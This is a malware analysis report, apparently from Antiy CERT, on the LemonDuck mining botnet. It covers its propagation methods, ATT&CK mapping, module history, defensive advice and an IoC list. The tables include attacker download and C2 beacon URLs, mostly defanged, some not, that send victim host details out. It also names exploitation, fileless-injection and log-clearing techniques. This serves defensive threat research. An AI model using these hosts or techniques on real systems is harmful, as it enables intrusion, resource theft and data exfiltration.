Typical Mining Family Series Analysis 4 ——LemonDuck Mining Botnet

The original report is in Chinese, and this version is an AI-translated edition.

1.Introduction

With the rise of blockchain technology and virtual currencies such as cryptocurrencies in recent years, the open source of mining Trojans has lowered the threshold for obtaining mining Trojans. In addition to a large number of black industry organizations continuing to operate mining Trojans, other black industry organizations that did not previously operate mining Trojans have turned their operations to mining Trojans, resulting in the continued activity of mining Trojans. On September 3, 2021, the National Development and Reform Commission and other departments issued a notice on rectifying virtual currency “mining” activities [1] , which clearly required the rectification of virtual currency mining activities and the crackdown on mining activities. In the year after the issuance of the notice, the mining rectification activities have achieved significant results, and the number of mining Trojans encountered by organizations such as government, enterprises, and schools has continued to decrease. According to relevant data, the price of cryptocurrencies fell several times in 2022, and the overall market value showed a downward trend, but the spread of mining Trojans is still profitable for attackers. Therefore, in 2022, many small mining Trojan families still emerged. For example, Hezb, “1337” and Kthmimu mining Trojan families.

Antiy CERT has compiled a special report on the typical popular mining Trojan families that have been tracked and stored in recent years, and has released them in recent months, and continues to track new popular mining families. The special report will detail the historical evolution of the mining Trojan family, analyze the iterative versions of the family samples, sort out historical attack events, provide post-infection troubleshooting methods, and publish more IoCs. In addition, we will continue to improve our own security product capabilities, adopt effective technical solutions to detect and remove mining Trojans, and help organizations such as government, enterprises, and schools effectively protect and remove mining Trojans.

2.Introduction to Mining Trojans

2.1 What Is Mining

“Mining” refers to obtaining virtual currency by executing proof of work or other similar computer algorithms. “Mine” represents virtual currency, and workers who mine are usually called “miners”. “Mining Trojan” is an integrated malicious code that can implant mining programs into the victim’s computer through various means, and use the computing power of the victim’s computer to mine without the user’s knowledge, thereby obtaining illegal profits. This type of mining program that illegally invades the user’s computer is called a mining Trojan.

There are two ways to mine: one is solo (directly connected to the central network), and all the output income belongs to oneself; the other is to connect to the mining pool, and the income is shared with the mining pool. Since the technical difficulty of connecting to the mining pool is relatively low and the income is relatively stable, mining trojans usually use this method. There are also two types of mining: one is passive mining, in which the mining program is implanted without the user’s knowledge, and the virtual currency obtained belongs to the intruder who implanted the mining program; the other is active mining, in which personnel actively use computing assets to run mining programs, and the virtual currency obtained belongs to the owner or user of the computing assets. The essence of mining is to calculate and return the hash value that meets the conditions, and the method used is brute force calculation, the main feature of which is the consumption of host resources and the waste of user power resources.

2.2 Why Is Mining Becoming More and More Rampant?

Comparing it with the equally popular ransomware activities, we can find that compared with ransomware, mining activities have more stable income. In ransomware incidents, on the one hand, it is difficult to accurately locate the host with important content encrypted, and on the other hand, the victim cannot be guaranteed to receive unlocking services after paying the ransom, which leads to a serious disproportion between the scale of ransomware activities and the ransom obtained.

In mining activities, as long as the mining trojan runs on the computer, it can obtain shares in the mining pool (the specific situation depends on the allocation model of the mining pool) and convert them into income. The difficulty of mining is also lower than that of ransomware activities. Most of them will use open source programs and register a wallet address. In the mining process, you don’t need to invest any other energy and can just sit back and enjoy the fruits of your labor.

In addition, the value-added and anonymity of virtual currency are also one of the reasons why mining Trojans are becoming increasingly rampant. Through virtual currency, not only can they evade financial tracing methods in the real world, but they can also obtain currency with value-added potential, which can be said to kill two birds with one stone. This is also the reason why mining Trojans prefer anonymous currencies (e.g. Monero).

2.3 The Harm of Mining Trojans

Usually, victims think that mining Trojans will only cause the system to freeze and will not have much impact on themselves. However, mining Trojans not only freeze the system, but also reduce the performance and service life of computer equipment, endanger the operation of the organization, and waste electricity and energy. In addition, mining Trojans now generally leave backdoors, causing the victim’s host to become the attacker’s control node, thereby forming a botnet and then issuing commands to attack other computers. Therefore, mining Trojans at this stage are no longer just performing simple operations such as mining, but are gradually beginning to use intrusion capabilities to gain more illegal profits.

3.Overview

The LemonDuck mining botnet was first active on December 14, 2018. Its operating organization used a supply chain method to spread the botnet, that is, to invade the Driver Life update server and replace the update program download link. This allowed the mining botnet program to be implanted in the user’s host when the user updated the Driver Life related software. At the same time, it spread through the EternalBlue vulnerability to achieve widespread dissemination. According to researchers, it infected 100,000 hosts within two hours of the activity [2]. The emergence of supply chain dissemination in the field of operating malicious mining Trojans or botnets has attracted the attention of most network security vendors. In the more than three years since then, the mining botnet has continuously added new dissemination methods, mainly using multiple vulnerability exploits, service password cracking, and phishing email delivery, to expand its dissemination capabilities. The botnet has formed a modular combination capability during the continuous update process, and also steals basic information of the target host when updating each module.

From the above attack techniques and activity characteristics of the LemonDuck mining botnet, it can be seen that its operating organization has the technical capabilities of APT organizations, but actively engages in cybercrime activities that attract the attention of the cybersecurity community. The main purpose is to make profits. At the same time, unlike general cybercrime organizations, its technical capabilities are diversified and its profitability is more prominent.

4.LemonDuck Mining Botnet

LemonDuck mining botnet, also known as “Eternal Blue Downloader Trojan” and DTLMiner. These names are mainly related to the spread and attack activities of the Trojan, such as using Driver Life update servers to spread in the early stage, using Eternal Blue vulnerabilities to spread in the target system, and C2 communication and PowerShell script codes with “LemonDuck ” strings. At the same time, in previous update activities, due to the setting of specific named scheduled tasks, researchers named them “Blue Tea Operation” [3] and “Black Ball Operation” [4] .

The LemonDuck mining botnet is a malware that integrates multiple malicious functions. It is active in the target network mainly through botnet and mining activities. Its modules are frequently iterated, with high iteration efficiency and increasingly rich module functions. During the update process, it adds different vulnerability exploitation components, mobile storage devices, phishing emails and other propagation methods, which greatly improves the propagation efficiency. At the same time, it expands its main business during the update process, adding new information theft and malware delivery functions.

Table 4 ‑1 LemonDuck mining botnet basic information

Family nameThere are many names, such as Eternal Blue Downloader Trojan, Eternal Blue Trojan Downloader, LemonDuck, DTLMiner
First disclosure timeDecember 15, 2018​​​
First event timeDecember 14, 2018​​​
Reason for namingDriving Life software supply chain spread, EternalBlue vulnerability spread, PowerShell scripts and C2 connection User-Agent contains “Lemon_Duck” string
Threat typesMining, botnet
TargetNo specific goal
Mode of transmissionSupply chain propagation, EternalBlue vulnerability exploitation, SMB brute force cracking, $IPC brute force cracking, phishing emails, SSH brute force cracking, Redis brute force cracking, RDP brute force cracking, Yarn unauthorized access vulnerability, phishing emails

Since the LemonDuck mining botnet was first disclosed, its subsequent activities have become more rampant, with new methods of attack, spread, and defense evasion. These include the spread of SMB weak passwords [5] , MySQL brute force cracking [6] , the conversion of mining modules to fileless form [7] , the new “Stuxnet III” vulnerability (CVE-2017-8464) exploitation [8] , SSH brute force cracking [9] , the new ClipBanker stealer [10] , and new attacks against Docker targets [11] .

Table 4 ‑2 LemonDuck attack timeline​

TimeEvent
December 2018​​​Hijacking multiple software upgrade channels such as “Driver Life” to distribute mining Trojans and using the “Eternal Blue” vulnerability to spread
January 2019​Write backdoor programs and mining programs into scheduled tasks, add Mimikatz password collection module, and use SMB weak passwords to perform brute force cracking on the intranet
February 2019​Added MySQL brute force attack, modify the database administrator account password
March 2019​Updated lateral propagation modules ipc and ii.exe. The fileless attack module is downloaded by the PowerShell backdoor and is no longer released by the parent PE. New weak password brute force cracking+wmic, Passthehash+ MBC lient/SMBE xec
April 2019​Added fileless mining module
July 2019​New “Stuxnet 3” vulnerability (C VE-2017-8464 ) exploit, spread through removable hard drives and network shares
October 2019​​Added Bluekeep vulnerability C VE-2019-0708 detection and reporting function
April 2 020New phishing email attack
May 2020​Added SMBG host vulnerability CVE-2020-0796 detection and reporting function, and added SSH brute force cracking code
June 2020New Windows-side vulnerability SMBG host vulnerability (CVE-2020-0796 ) exploit, new Linux-side SSH brute force cracking function, and cross-platform mining trojans have begun to spread
August 2020New attack method for Hadoop Yarn unauthorized access vulnerability
December 2020​​​New Web Logic Unauthorized Command Execution Vulnerability (CVE-2020-14882 ) attack propagation method
February 2021​The Linux platform uses most modules of the Outlaw mining botnet and adds a scanning and propagation module
September 2021​New IPC brute force cracking, Elastic Search vulnerability, Apache Solr remote command execution vulnerability, Docker Remote API unauthorized access
November 2021​​​New Zegost-like backdoor, new Clip Banker stealing Trojan, new executable program mining
April 2022​Added mining operation targeting Docker

LemonDuck attack timeline, as shown in Figure 4-1:

Figure 4‑1LemonDuck attack activity timeline

5.ATT&CK Mapping Diagram Corresponding to the LemonDuck Mining Botnet

Antiy CERT sorted out the distribution diagram of technical characteristics corresponding to the previous attack activities of this botnet:

Figure 5‑1 Mapping of technical characteristics to ATT&CK

Specific ATT&CK technical behavior description table:

Table 5 ‑1 ATT&CK technique behavior description table corresponding to the incident

ATT&CK Phase/CategorySpecific BehaviorNotes
Initial accessLeverage public-facing applicationsSpread by exploiting software vulnerabilities
PhishingSpread through phishing emails
Hacking the supply chainThe mining trojan that invaded the Driver Life update server
ExecuteUse command and script interpretersUse PowerShell or bat command
Utilize scheduled tasks/jobsAdd a scheduled task
PersistenceUtilize scheduled tasks/jobsAdd scheduled tasks and execute them at regular intervals
Defense evasion  Delete the beacon in the hostClear related operation logs
Obfuscate files or informationEncode related malicious script files
Credential accessGet the credentials from where the password is storedGet SSH login credentials
DiscoverDiscover system informationDetect target system version information
Discover the system owner/userDetect target system users
Find system timeDetect target system time
Lateral movementExploit remote service vulnerabilitiesExploit the vulnerability of the target host to spread
Conduct internal spear phishing attacksUse the target host’s mailbox address book to send phishing emails to spread
Leverage remote servicesExploit SSH services to move laterally
CollectCollect local system dataCollect sensitive information of the target system
Data exfiltrationUse Web Service ReturnsUse HTTP GET request to return data
InfluenceResource hijackingHijacking system computing resources for mining

6.Protective Recommendations

In response to mining attacks, Antiy recommends that enterprises take the following protective measures:

  1. Windows/Linux version of Antiy Intelligent Endpoint Protection System;
  2. Strengthen SSH passwords: Avoid using weak passwords. It is recommended to use passwords of 16 characters or longer, including a combination of uppercase and lowercase letters, numbers, and symbols. Avoid using the same password on multiple servers.
  3. Update patches in time: It is recommended to enable the automatic update function to install system patches. The server should update system patches in time;
  4. Update third-party application patches in a timely manner: It is recommended to update third-party applications in a timely manner, especially those related to business, such as Hadoop Yarn, WebLogic, Docker and other application patches;
  5. Enable logs: Enable key log collection functions (security logs, system logs, error logs, access logs, transmission logs, and cookie logs) to provide a basis for tracing security incidents.
  6. Host reinforcement: conduct penetration testing and security reinforcement on the system;
  7. Deploy an intrusion detection system (IDS): Deploy traffic monitoring software or equipment to facilitate the discovery and tracing of malicious code. Antiy Persistent Threat Detection System (PTD) uses network traffic as the detection and analysis object, can accurately detect a large amount of known malicious code and network attack activities, and effectively discover suspicious network behaviors, assets and various unknown threats;

Antiy Service: If you are attacked by malware, it is recommended to isolate the attacked host in time and protect the site while waiting for security engineers to check the computer; Antiy 7*24 hours service hotline: 400-840-9234.

It has been proven that Antiy Intelligent Endpoint Protection System (IEP for short) can effectively detect and kill the mining botnet.

Figure 6‑1 Antiy IEP can effectively detect and kill the mining botnet

7.Sample Analysis

This sample analysis is not limited to a single sample. It mainly analyzes the special functions of the LemonDuck mining botnet family during the update process, so that readers can have a more comprehensive understanding of the LemonDuck mining botnet.

7.1 EternalBlue Vulnerability Propagation

Use the EternalBlue vulnerability exploit component and use Py2exe or Pyinstaller to package it during the sample update process.

Figure 7 ‑1 EternalBlue vulnerability exploit components

7.2 Phishing Email Propagation

Using information related to the new coronavirus, phishing emails carrying a malicious document named “urgent.doc” were spread.

Figure 7 ‑2 Phishing email (Image source: Rising)

The malicious document is actually an RTF file with the CVE-2017-8570 vulnerability exploitation function, which can trigger the vulnerability by opening the document and execute the PowerShell code in it.

Figure 7 ‑3 Vulnerability documents

In the later stages, automated phishing email distribution functions were added to the sample, such as traversing the email communication directory of the target host.

Figure 7 ‑4 Traverse the mailbox communication directory

The default email title and body.

Figure 7 ‑5 Preset email title and body

Preset the attachments to be sent.

Figure 7 ‑6 Preset attachments to be sent

7.3 Backdoor Trojans “Fatten” Themselves

The fattening process itself is divided into two steps. The first stage is to create a batch and use the type command to copy the file itself.

Figure 7 ‑7 Create a batch script

In the second stage, based on the original file size, the size of the randomly generated write data, and the randomly created write data, new backdoor Trojan file data is generated, and then written into the original file to overwrite it. The final file size is basically above 40MB. The random changes in the file size and hash value are achieved to circumvent the basic defense solution.

Figure 7 ‑8 Randomly generate data and fill

7.4  Fileless Mining

Use the open source Invoke- ReflectivePEInjection to inject the mining program into the PowerShell process memory for execution, thus achieving fileless mining.

Figure 7 ‑9 Fileless mining

7.5 CVE-2017-8464 Exploit

Newly added CVE-2017-8464 ( Stuxnet III ) vulnerability exploitation function, combined with the disk type detection function, can spread malicious shortcuts with vulnerabilities in network shared disks or mobile storage media, induce targets to click to trigger the vulnerability exploitation code, and improve the botnet’s propagation capabilities.

Figure 7 ‑10 CVE-2017-8464 vulnerability exploit

7.6  Attacks on Linux

7.6.1 End Other Mining Processes

End the processes of other mining Trojans through parameters such as process name, file name, and network connection.

Figure 7 ‑11 Ending other mining trojan processes

7.6.2  Download and Execute the Mining Trojan

Download and execute mining Trojans through various methods.

Figure 7 ‑12 Download and execute the mining trojan

7.6.3 Use the Target Host’s SSH Credentials to Attempt to Spread Laterally

Through the private key information on the victim host and the IP address of the historical SSH connection, it traverses and verifies whether the private key and other hosts match, attempts to connect to the remote host through password-free SSH, and executes commands to download and execute scripts on the remote host.

Figure 7 ‑13 Lateral Transmission

7.6.4 Clear Logs

The script for Linux platform contains the function of clearing related log data at the end.

Figure 7 ‑14 Log clearing

8.LemonDuck Module Iteration

8.1 Parent File Iteration

The main function of the parent file is to release and execute the cloud control module and download and execute the propagation module. As the scope of propagation expands and the LemonDuck mining botnet components are frequently added and their functions become richer, the role of the parent file has also been transferred, and the subsequent component updates and propagation are basically completed by the PowerShell backdoor.

Table 8 ‑1 Parent file iteration

Matrix file formatRemark
PE file​Deliver the target through the upgrade channel of Driver Life. Release the cloud control Trojan and download and execute the attack propagation module. At the same time, it has the function of collecting sensitive information of the system and dynamically obtaining the cloud control code. Supply Chain Propagation Link: hxxp://pull.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe hxxp://dl.haqo.net/dl.exe v1: F79CB9D2893B254CC75DFB7F3E454A69
PE file​hxxp://172.104.73.9/dll.exe, hxxp://dl.haqo.net/updatedl.exe, hxxp://120.52.51.13/dl.haqo.net/dl.exe v2: FB89D40E24F5FF55228C38B2B07B2E77
PE file​Eternal Blue Communication Link: hxxp://dl.haqo.net/dll.exe?fr=xx、hxxp://dl.haqo.net/updater.exe?ID=xxxxx (links with parameters, sensitive information of the target host needs to be uploaded when accessing) v3: 59B18D6146A2AA066F661599C496090D

8.2Cloud Control Module Iteration

The cloud control module was active in the early stage, and the mining botnet mainly updated and downloaded related components through the backdoor module in the later stage.

Table 8‑2 Cloud control module iteration

File formatSource
PE file​There is a parent PE file resource section, which is actually a shellcode loader that dynamically obtains the shellcode in the shared memory of the parent PE process to realize the remote control function.
PE file​Independent Process Have a service called Ddriver to start Have a scheduled task named Ddriver to start

8.3 Propagation Module Iteration

The iteration of the propagation module is mainly reflected in the changes in the module carrier file format and the propagation module function. The file format is mainly PE file and PowerShell script, and the functional changes have added new propagation methods such as the EternalBlue vulnerability, CVE-2017-8464 (lnk vulnerability), Blue keep vulnerability, Yarn unauthorized access vulnerability, and RDP\SMB\MSSQL\$IPC brute force cracking.

Table 8 ‑3 Propagation module iteration

TimeFile typeRemark
December 14, 2018​​​PE file​The EternalBlue vulnerability exploit module is written in Python and has commands to be implanted (downloaded and executed) after successful exploitation. The vulnerability exploit module is packaged by the py2exe program. EternalBlue exploit
January 25, 2019​PE FilesAdded mimikatz to collect login passwords Added brute force cracking of SMB weak passwords
February 10, 2019PE file​Files are packaged by Pyinstaller
February 23, 2019​PE file​Added MSSQL brute force attack
March 8, 2019PE file​Downloaded by PowerShell backdoor
PowerShell scriptFileless technology, PowerShell scripts Eternal Blue vulnerability exploit, SMB brute force cracking
March 28, 2019​PowerShell scriptFileless technology, Added Invoke-SMBExec , using NTML hash dictionary for Pass the Hash Attack
July 19, 2019​PowerShell scriptAdded CVE-2017-8464 lnk vulnerability exploit, infecting mobile storage media and network shared disks, and added MSSQL brute force cracking
PowerShell scriptAdded RDP brute force cracking, $IPC brute force cracking
April 3, 2020PowerShell scriptSpread by phishing emails, the attachment “urgent.doc” contains vulnerability CVE-2017-8570
June 10, 2020PowerShell scriptNew CVE-2020-0796 vulnerability attack Added SSH and Redis brute force attacks for Linux servers
June 24, 2020​PE file​New exe files packaged by Python, with the ability to spread through EternalBlue vulnerability, MSSQL brute force cracking, $IPC, SMB brute force cracking, etc.
August 18, 2020​PowerShell scriptNew attack on Linux servers using Yarn unauthorized access vulnerability

8.4 Backdoor Module Iteration

The backdoor module periodically obtains PowerShell code, achieves long-term residence in the target system, and updates other components of the mining botnet.

Table 8 ‑4 Backdoor module iteration

File TypeRemark
No file formatExecute PowerShell code in a scheduled task named MicrosoftwindowsBluetooths, and get code execution from a certain URL at a fixed time. Once every 50 minutes hxxp://r.minicen.ga/r?p (url)
No file formatExecute PowerShell code in a scheduled task named Bluetooths, and get code execution from a certain URL at a fixed time. Once every 50 minutes http://v.beahh.com/v+target host domain name (url)
No file formatScheduled task name:\Microsoft\Windows\Rass http://v.beahh.com/wm?smb

8.5 Mining Module Iteration

The mining module is mainly implemented in the iterative process, realizing the mining function on Windows and Linux systems through carriers such as shellcode, PE files, PowerShell fileless and E LF files.

Table 8 ‑5 Mining module iteration

File TypeMining PoolsRemark
No file, shellcode172.105.204.237:443The parent file is obtained from hxxp://i.haqo.net/i.png and shared to the cloud control module through shared memory
unknownunknownhxxp://dl.hago.net/xmrig-64_1.mlz hxxp://dl.hago.net/xmrig-32_1.mlz
PE FilesunknownXmrig, start as a separate process
PowerShelllplp1.beahh.com:443 lplp1.abbny.com:443 lplp1.ackng.net:443 216.250.99.49:443Fileless mining, downloaded by PowerShell and executed in memory.
hxxp://down.beahh.com/d64.dat (64-bit) hxxp://down.beahh.com/d32.dat (32-bit) c90ecc4e12e085c7fbc571d9ba6d00d4 f21c98d43e678568917dabf121436b74
ELFlplp.ackng.com:444Fileless propagation module adds SSH and Redis brute force cracking, and after success, a script is implanted to download the mining program by the script hxxp://d.ackng.com/ln/xr.zip

8.6 Information Stealing Module Iteration

The information theft is mainly to obtain the computer name, GUID, MAC address, system version and system time of the target host, which is mainly included in the parameters when accessing the download link of the mining botnet related components through Get request. In addition to this method, the target host cookies and email information can also be stolen through the email, cookie, ftp and http libraries in the propagation module.

Table 8 ‑6 Information stealing module iteration

Link
http[:]//dl.haqo.net/updater.exe?ID=yuefmigojqcn&GUID=3B885DD9-1DF9-E54C-A5C5-D08BB6A85DEC&_T=1551595904
http[:]//dl.haqo.net/ins.exez?ID=rzcsyote&GUID=3B885DD9-1DF9-E54C-A5C5-D08BB6A85DEC&_T=1548372990
http[:]//dl.haqo.net/stak.mlz?ID=DGSJ-GUOQUANJU&GUID=5279AC0C-493F-11E2-B45D-A474EB8B2600&_T=1550901673
http[:]//pp.abbny.com/u.png?ID=CICADC&GUID=C9414D56-B061-F3EB-815F-196AE988AC3D&MAC=00:0C:29:88:AC:3D&OS=Windows%208.1&BIT=64&_T=1673568416
http[:]//oo.beahh.com/u.png?_t=1669015209&bit=32&guid=3980a6ba-e025-44f5-ae6e-d2ca02dd47a9&id=tom-pc&mac=52:54:00:d2:51:ea&os=windows%207
http[:]//oo.beahh.com/t.php?ID=WALKER-PC&GUID=08A73516-31A7-11EC-9367-AD3FA9840C81&MAC=16:7C:9A:14:3B:3A&OS=Windows%207&BIT=64&CARD=Standard%20VGA%20Graphics%20Adapter&_T=1634726

9.IoCs

Domain
d[.]ackng.com
d[.]beahh.com
d[.]ttr3p.com
dl[.]hago.net
dl[.]haqo.net
dl[.]haqo[.]net
down[.]bddp.net
down[.]beahh.com
down[.]sqlnetcat.com
i[.]hago.net
i[.]haqo.net
ii[.]hago.net
ii[.]haqo.net
info[.]abbny.com
info[.]amynx.com
info[.]beahh.com
info[.]hago.ne
info[.]haqo.net
info[.]zz3r0.com
log[.]bddp.net
loop2[.]hago.net
loop[.]abbbny.com
loop[.]haqo.net
lplp1[.]abbny.com:443
lplp1[.]ackng.net:443
lplp1[.]beahh.com:443
lplp[.]ackng.com:444
o[.]beahh.com
oo[.]beahh.com
oop2[.]hago.net
oop[.]abbbny.com
oop[.]hago.net
p[.]abbny.com
p[.]beahh.com
p[.]estonine.com
pp[.]abbny.com
ppabbny[.]com
pslog[.]estonine.com
pull[.]update[.]ackng[.]com
t[.]ackng.com
t[.]amxny.com
t[.]amynx.com
t[.]amynx.con
t[.]awcna.com
t[.]netcatkit.com
t[.]sqlnetcat.com
t[.]tr2q.com
t[.]zer9g.com
t[.]zz3r0.com
update[.]bddp.net
v[.]bddp.net
v[.]beahh.com
w[.]beahh.com
w[.]zz3r0.com
wbeahh[.]com
IP
172.105.204.237:443
216.250.99.49:443
HASH
F79CB9D2893B254CC75DFB7F3E454A69
74E2A43B2B7C6E258B3A3FC2516C1235
2E9710A4B9CBA3CD11E977AF87570E3B
59B18D6146A2AA066F661599C496090D
30429A24F312153C0EC271CA3FEABF3D
F9144118127FF29D4A49A30B242CEB55
FB89D40E24F5FF55228C38B2B07B2E77
1E0DB9FDBC57525A2A5F5B4C69FAC3BB
5AB6F8CA1F22D88B8EF9A4E39FCA0C03
D4E2EBCF92CF1B2E759FF7CE1F5688CA
32653B2C277F18779C568A1E45CACC0F
AB1C947C0C707C0E0486D25D0AE58148
BC26FD7A0B7FE005E116F5FF2227EA4D
A4B7940B3D6B03269194F728610784D6
85013CC5D7A6DB3BCEE3F6B787BAF957
667A3848B411AF0B6C944D47B559150F
0A4DCD170708F785F314C16797BAADDB
DEF0E980D7C2A59B52D0C644A6E40763
23196DE0EDE25FB9659713FA6799F455
CE924B12FFC55021F5C1BCF308F29704
2FBCE2ECF670EB186C6E3E5886056312
E05827E44D487D1782A32386123193EF
66EA09330BEE7239FCB11A911F8E8EA3
47064F56C84D674AB1935186A365219F
8A2042827A7FCD901510E9A21C9565A8
FA13FD1BB0A2FAAC06CB94592DD6BB1B
6D444144D8E7A07CBA1FD5B042A49012
C90ECC4E12E085C7FBC571D9BA6D00D4
F21C98D43E678568917DABF121436B74
6AA4DE709246FB080C621A6D3E7F9360
DEBE7B1929D4AD269DD8C4B159ABD269
AE0AC43FEBAD2AC885E3F8A020A2103E
07DD4357A22AF86CC73710239E7DBC07
4EC29049AC81521C37DAD2DA6754D6A3
FFEB6DC402F37542889AE2D17B0EDDF2
F1BF55BA24D1A05E80A7CA1D6774AB3D
9ABFFFAF7A4877C9187C3F8A6E59B065
F19D9A77C3F6F07E43F5822F9A796104
8516C4592D8DE8B25DF3A5E9AEFF12E0
8EC31DD982FA038D99FBBBDDFCEB044C
556D5B9FCA78386C15EC59B2E9105E60
43255582721DC0A0796491FE91851630
76E47B53D5D57D7595EF687E9AE92891
3380700C5D87F1F0538DC506FB464FFC
2E2E3ABC4BEB42ED902C4AB820C18AF6
98BF04D3D6E25C0CAC4AC6AF604BCDBF
D4C35DA00EF1122401DF0FB2B0EA782B
4764ADA8BD0665B7EDA593B81DF116E2
3A6714003C362564145108E354F52F39
300967F8E0C01600742CBD4D15844EF0
BBCBEC1A0671B3D67929B628E433A8D5
F444A893A14510684A6490B6748772EF
E6AE2AEF792D3064A24BF7CF935439D8
9D00CCCBB3B73171BF58FE66BF7DAFF7
C08080797A5DA1D05CDBA5760B30B2C1
6965AA9A1EE2B04496D89A6BBCDB37FF
7C029C86CA1ABA2D269BC5C43418CC75
A3CF8550866FBAAF8D98566243B78758
E5AE6D154A6BEFC00DEEA0CCB49DC9B8
88949E6A329C6B2796DDCC81564CEE1A
E3687C56B8BE535398051405F8221D82
7805776504E8A39C2A892D89E2492C12
CC67B69740C7BD0744ACD3242729CE15
99ECCA08236F6CF766D7D8E2CC34EFF6
2977084F9CE3E9E2D356ADAF2B5BDCFD
17703523F5137BC0755A7E4F133FC9D3
8B0CB7A0760E022564465E50CE3271BB
5B3C44B503C7E592E416F68D3924620F
EF3A4697773F84850FE1A086DB8EDFE0
8EC20F2CBAD3103697A63D4444E5C062
AC48B1EA656B7F48C34E66D8E8D84537
D61D88B99C628179FA7CF9F2A310B4FB
F944742B01606605A55C1D55C469F0C9
ABD6F640423A9BF018853A2B40111F76
57812BDE13F512F918A0096AD3E38A07
D8E643C74996BF3C88325067A8FC9D78
125A6199FD32FAFEC11F812358E814F2
FB880DC73E4DB0A43BE8A68EA443BFE1
8D46DBE92242A4FDE2EA29CC277CCA3F
48FBE4B6C9A8EFC11F256BDA33F03460
98F48F31006BE66A8E07B0AB189B6D02
6BB4E93D29E8B78E515653426929C824
E009720BD4BA5A83C4B0080EB3AEA1FB
092478F1E16CBDDB48AFC3EECAF6BE68
CA717602F0700FABA6D2FE014C9E6A8C
888DC1CA4B18A3D424498244ACF81F7D
C21CAA84B327262F2CBCC12BBB510D15
E04ACEC7AB98362D87D1C53D84FC4B03
E49367B9E942CF2B891F60E53083C938
B204EAD0DCC9CA1053A1F26628725850
B6F0E01C9E2676333490A750E58D4464
95ADF923BA32CC5004277867181680C8
31CE6662BE59CA4C01C1730BC7150F19
55F0DD8C306DB9FC8B9E45705CD66598
C17CDEE1AFDC272A46B1CF25C1F44DCC
24C4149468926BEDCB41F50AC88B40F3
3162E619F8EB49F4DD6B48CB09075E10
94838EDD7470271386153D3B89FE6A6C
E561003B347F391EEC44759DE1DA5EBF
FF75C064248579F4BDABEC6D6DBA89D6
2AE7F2F4F0B114ED074BA191ACF1665A
B1BB11AEF730C4B0D2C2C94FDBF2A823
A8BF439DFC1391D5124D4CCCBD6C7664
4D93C29622E285E068B613EF114517FD
46B1DA47A20AFAA11207A493EBFBD090
E47495DA1B30BDA0E42089CA6FC07B62
3C4C0E75810C0FDAE2B0162B42FE04A0
5BB6F5AF311C3A5576379874FC193EF3
E5B8744C220D703F9A0E43F3A202C785
4001BA98A424FDB63047A23AF97EC590
A921B532D5D239E4A2E71E5F853195CD
CFCFC563F33CB2E96F2FF51F6F603FA3

Appendix 1: References

[1] Notice from the National Development and Reform Commission and other departments regarding the crackdown on virtual currency “mining” activities

http://www.gov.cn/zhengce/zhengceku/2021-09/25/content_5639225.htm

[2] Detailed Analysis Report on Driver Life Trojan: Infecting 100,000 Computers in 2 Hours to Mine Monero

https://s.tencent.com/research/report/610.html

[3] EternalBlue Trojan downloader has launched Operation Blue Tea and has transformed into an email worm.

https://s.tencent.com/research/report/957.html

[4] EternalBlue Trojan Downloader Launches Black Ball Operation, Adds SMBGhost Vulnerability Detection Capability

https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ

[5] EternalBlue downloader malware remains active: originating from supply chain attacks, constantly changing attack methods

https://s.tencent.com/research/report/657.html

[6] The indestructible cockroach: The EternalBlue Downloader Trojan has once again upgraded its attack methods.

https://s.tencent.com/research/report/660.html

[7] EternalBlue Trojan Downloader Pioneers New Fileless Mining Model

https://s.tencent.com/research/report/702.html

[8] The Eternal Blue Downloader Trojan has been updated again, adding support for spreading via removable drives and network shared drives.

https://s.tencent.com/research/report/768.html

[9] Eternal Blue Trojan Downloader Updated Again, Cloud Hosts Become New Target

https://s.tencent.com/research/report/1163.html

[10] LemonDuck has evolved and returned, aiming to target government, energy, and other industries for mining and espionage attacks.

https://mp.weixin.qq.com/s/8uh9peTW3EPkFpODFl137A

[11] LemonDuck Targets Docker for Cryptomining Operations

https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/

Appendix 2: About Antiy

Antiy is committed to enhancing the network security defense capabilities of its customers and effectively responding to security threats. Through more than 20 years of independent research and development, Antiy has developed technological leadership in areas such as threat detection engines, advanced threat countermeasures, and large-scale threat automation analysis.

Antiy has developed IEP (Intelligent Endpoint Protection System) security product family for PC, server and other system environments, as well as UWP (Unified Workload Protect) security products for cloud hosts, container and other system environments, providing system security capabilities including endpoint antivirus, endpoint protection (EPP), endpoint detection and response (EDR), and Cloud Workload Protection Platform (CWPP) , etc. Antiy has established a closed-loop product system of threat countermeasures based on its threat intelligence and threat detection capabilities, achieving perception, retardation, blocking and presentation of the advanced threats through products such as the Persistent Threat Detection System (PTD), Persistent Threat Analysis System (PTA), Attack Capture System (ACS), and TDS. For web and business security scenarios, Antiy has launched the PTF Next-generation Web Application and API Protection System (WAAP) and SCS Code Security Detection System to help customers shift their security capabilities to the left in the DevOps process. At the same time, it has developed four major kinds of security service: network attack and defense logic deduction, in-depth threat hunting, security threat inspection, and regular security operations. Through the Threat Confrontation Operation Platform (XDR), multiple security products and services are integrated to effectively support the upgrade of comprehensive threat confrontation capabilities.

Antiy provides comprehensive security solutions for clients with high security requirements, including network and information authorities, military forces, ministries, confidential industries, and critical information infrastructure. Antiy has participated in the security work of major national political and social events since 2005 and has won honors such as the Outstanding Contribution Award and Advanced Security Group. Since 2015, Antiy’s products and services have provided security support for major spaceflight missions including manned spaceflight, lunar exploration, and space station docking, as well as significant missions such as the maiden flight of large aircraft, escort of main force ships, and Antarctic scientific research. We have received several thank-you letters from relevant departments.

Antiy is a core enabler of the global fundamental security supply chain. Nearly a hundred of the world’s leading security and IT enterprises have chosen Antiy as their partner of detection capability. At present, Antiy’s threat detection engine provides security detection capabilities for over 1.3 million network devices and over 3 billion smart terminal devices worldwide, which has become a “national-level” engine. As of now, Antiy has filed 1,877 patents in the field of cybersecurity and obtained 936 patents. It has been awarded the title of National Intellectual Property Advantage Enterprise and the 17th (2015) China Patent Excellence Award.

Antiy is an important enterprise node in China emergency response system and has provided early warning and comprehensive emergency response in major security threats and virus outbreaks such as “Code Red”, “Dvldr”, “Heartbleed”, “Bash Shellcode” and “WannaCry”. Antiy conducts continuous monitoring and in-depth analysis against dozens of advanced cyberspce threat actors (APT groups) such as “Equation”, “White Elephant”, “Lotus” and “Greenspot” and their attack actions, assisting customers to form effective protection when the enemy situation is accurately predicted.